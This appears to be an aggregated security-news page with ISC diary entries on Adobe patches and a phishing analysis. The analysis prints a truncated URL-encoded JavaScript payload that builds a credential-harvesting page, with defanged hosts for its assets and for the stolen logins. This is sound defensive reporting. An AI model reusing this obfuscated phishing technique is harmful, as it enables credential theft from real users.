Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Anonymous' Op Icarus: Cyberattacks on Banks Around the World
SYS-CON Media (press release)
As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ...

and more »
 
 
[security bulletin] HPSBGN03597 rev.1 - HPE Cloud Optimizer (Virtualization Performance Viewer) using glibc Remote Denial of Service (DoS)
 
The National Institute of Standards and Technology (NIST) is offering up to $1 million in grants to establish up to eight Regional Alliances and Multistakeholder Partnerships to Stimulate (RAMPS) cybersecurity education and workforce ...
 

SANS Announces Agenda for Annual DFIR Summit in Austin, Texas
SYS-CON Media (press release)
BETHESDA, Md., May 12, 2016 /PRNewswire-USNewswire/ -- SANS Institute, the global leader in information security training, today announced the agenda for its annual Digital Forensics & Incident Response (DFIR) Summit and Training to be held June 23 ...

and more »
 

As expected, Adobe released today updated versions of:

  • Flash Player (v21.0.0.242)
  • Flash Player ESR (v18.0.0.352)
  • AIR (v21.0.0.215)
  • Flash Player Linux (v12.2.202.621)

They are related toCVE-2016-4117. Windows, OSX, Linux and ChromeOS are affected but the patch is currently only available for Windows. Patch as soon as possible because the vulnerability is actively exploited in the wild.

Details:https://helpx.adobe.com/security/products/flash-player/apsa16-02.html

They alsoreleased new updated versions of:

  • AcrobatReader (v11.0.16)
  • Acrobat Reader DC (v2015.016.20039)

Details:https://helpx.adobe.com/security/products/acrobat/apsb16-14.html

Finally, ColdFusion also got a patch:https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Anonymous' Op Icarus: Cyberattacks on Banks Around the World
SYS-CON Media (press release)
As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ...

and more »
 

The Register

Lie back and think of cybersecurity: IBM lets students loose on Watson
The Register
That's because the infosec (sorry cyber security) biz is guilty of re-appropriating military terms such as APT en masse. IBM said collaborating with eight universities that have “some of the world's best cybersecurity programs” will help “further train ...

and more »
 

Im collecting a lot ofphishing samples every day and most of them are part of big waves of spam... Millions of messagesare sent with hopethat at least some victims will fall in the trap. And sometimes, you find a nice (different) one like yesterday. It was a classic email with the subject Important Notice"> document.write(unescape(%3c%21%64%6f%63%74%79%70%65%20%68%74%6d%6c%3e%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%6d%65%74%61%20%63%68%61%72%73%65%74%3d%22%75%74%66%2d%38%22%3e%0d%0a%3c%74%69%74%6c%65%3e%45%78%63%65%6c%20%4f%6e%6c%69%6e%65%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%67%65%6e%65%72%61%74%6f%72%22%20%63%6f%6e%74%65%6e%74%3d%22%57%59%53%49%57%59%47%20%... (very long payload) ...4%3d%22%22%3e%3c%2f%64%69%76%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e

This is not complicated to de-obfuscate this payload (the code is available here).The attacker generated a page with an online HTML editor and added a form to capture credentials.The rendered page looks like" />

The HTML objects are downloaded fromhxxp://tourkrabithailand.com/images/services/gr/ and credentials are posted tohxxp://mat-update.be/money/result.php. I contacted the Belgian CERT yesterday to report this website andthe domain isalready blocked.

Nothing fancy, bad design (why a blue Download button?) but it works! The JavaScript code runsbelow the radar with a low VT detection rate: 2/56 (link).

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
[slackware-security] mozilla-thunderbird (SSA:2016-132-01)
 
[security bulletin] HPSBST03599 rev.1 - HPE 3PAR OS running OpenSSH, Remote Denial of Service (DoS), Access Restriction Bypass
 
[security bulletin] HPSBST03598 rev.1 - HPE 3PAR OS using glibc, Remote Denial of Service (DoS), Arbitrary Code Execution
 
[security bulletin] HPSBST03586 rev.1 - HPE 3PAR OS, Remote Unauthorized Modification
 
Re: [slackware-security] imagemagick (SSA:2016-132-01)
 
Internet Storm Center Infocon Status